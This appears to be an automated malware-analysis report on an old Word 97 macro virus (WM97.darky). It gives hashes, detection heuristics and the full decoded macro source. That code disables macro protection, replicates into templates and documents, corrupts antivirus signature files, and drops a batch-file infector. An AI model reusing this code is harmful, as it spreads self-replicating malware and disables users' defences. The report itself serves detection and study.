Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 b1b55397bcbcdd56…

MALICIOUS

Office (OLE)

Size: 34.0 KB
Created: 1999-12-27 16:37:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 43d3e31e06f7ab6725cca28f8bc6366c
SHA-1: 48090b1b2a3591477bcac5d712f412e4bdc06eba
SHA-256: b1b55397bcbcdd5639782583517c2dcd293c67f2e4632b801463a6275cb29832
Risk score: 348

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

This document contains a legacy WordBasic macro with AutoClose functionality, which is designed to execute automatically when the document is closed. The macro attempts to export itself as 'darky.dll' and also interacts with security software directories, suggesting an attempt to disable defenses or establish persistence. The presence of legacy macro virus markers and the ClamAV detection of 'Win.Trojan.Pivis-2' and 'Win.Trojan.Darky-1' strongly indicate malicious intent.

Heuristics (7 findings)

  • ClamAV: Win.Trojan.Pivis-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected [medium] (OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script:
        SHELL "c:\darky"
  • VBA macro-virus self-replication / AV tampering [critical] (OLE_VBA_MACRO_VIRUS_REPLICATION)
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
        .VirusProtection = False
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro [low] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
        Sub AutoClose()
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4142 bytes
SHA-256: d74699243462d9d9d2454003d40a502ce557875fcff6cd9404a884cca9fa705e
Detection: ClamAV: Win.Trojan.Darky-1
Obfuscation or payload: unlikely

Preview of extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "darky"
Sub AutoClose()
' [WM97.darky.a]
' by -KD- / Metaphase VX Team & NoMercyVirusTeam
' Tech used from Mr.Vic, 29/A & NoMercy special thanx
' Special greetz to Darkman & 29/A
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("darky").Export "c:\darky.dll"
With Options
    .ConfirmConversions = False
    .VirusProtection = False
    .SaveNormalPrompt = False
End With
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
For X = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "darky" Then NormInstall = True
Next X
For X = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "darky" Then ActivInstall = True
Next X
If ActivInstall = True And NormInstall = False Then Set Dm = NormalTemplate.VBProject _
Else If ActivInstall = False And NormInstall = True Then Set Dm = ActiveDocument.VBProject
On Error GoTo leave_darky
If Day(Date) = "21" Then
Open "C:\f-prot\macro.def" For Output As #1
Print #1, " WM97.darky.a"
Print #1, " WM97.darky.a"
Print #1, " WM97.darky.a"
Close #1
SetAttr "C:\f-prot\macro.def", vbReadOnly
Open "C:\program files\mcafee\*.dat" For Output As #2
Print #2, " WM97.darky.a"
Print #2, " WM97.darky.a"
Print #2, " WM97.darky.a"
Close #2
SetAttr "C:\program files\mcafee\*.dat", vbReadOnly
Open "C:\f-macro\*.def" For Output As #3
Print #3, " WM97.darky.a"
Print #3, " WM97.darky.a"
Print #3, " WM97.darky.a"
Close #3
SetAttr "C:\f-macro\*.def", vbReadOnly
Open "c:\darky.bat" For Output As #4
Print #4, ":: [bat._darky.a]"
Print #4, ":: by -KD- / Metaphase VX Team & NoMercyVirusTeam"
Print #4, ":: Greetz to Darkman and 29/A"
Print #4, "::"
Print #4, "@echo off%__darky%"
Print #4, "if '%1=='_darky goto _darky%2"
Print #4, "set _darky=%0.bat"
Print #4, "if not exist %_darky% set _darky=%0"
Print #4, "if '%_darky%==' set _darky=autoexec.bat"
Print #4, "if exist c:\__darky.bat goto _darky_gettin_ya"
Print #4, "if not exist %_darky% goto exist_darky"
Print #4, "find "; CHR$(34); "_darky"; CHR$(34); "<%_darky%>c:\__darky.bat"
Print #4, "attrib c:\__darky.bat +h"
Print #4, ":_darky_gettin_ya"
Print #4, "if '%!_darky%=='-- goto _darky_pay"
Print #4, "set !_darky=%!_darky%-"
Print #4, "command /e:5000 /c c:\__darky _darky vx . .. \ %path%"
Print #4, ":exist_darky"
Print #4, "set _darky="
Print #4, "goto _darky_pay"
Print #4, ":_darkyvx"
Print #4, "shift%__darky%"
Print #4, "if '%2==' exit _darky"
Print #4, "for %%a in (%2\*.bat %2*.bat) do call c:\__darky _darky infect %%a "
Print #4, "goto _darkyvx"
Print #4, ":_darkyinfect"
Print #4, "find '_darky'<%3>nul"
Print #4, "if not errorlevel 1 goto _darky_jump"
Print #4, "type %3>_darky$"
Print #4, "echo.>>_darky$"
Print #4, "type c:\__darky.bat>>_darky$"
Print #4, "move _darky$ %3>nul"
Print #4, "set _darky#=%_darky#%-"
Print #4, "if %_darky#%==-- exit"
Print #4, ":_darky_jump"
Print #4, "set _darky!=%_darky!%-"
Print #4, "if %_darky!%==-- exit"
Print #4, ":_darky_pay"
Print #4, "echo.|date|find "; CHR$(34); "10"; CHR$(34); ">nul._darky"
Print #4, "if errorlevel 1 goto _darky_exit"
Print #4, "echo y| del c:\mcafee\*.dat"
Print #4, "if errorlevel 1 goto darkymsg"
Print #4, ":darkymsg"
Print #4, "echo bat._darky.a by -kd-"
Print #4, ":_darky_exit"
Close #4
SHELL "c:\darky"
Kill "c:\darky.bat"
Else
End If
leave_darky:
On Error Resume Next
Dm.VBComponents.Import ("c:\darky.dll")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub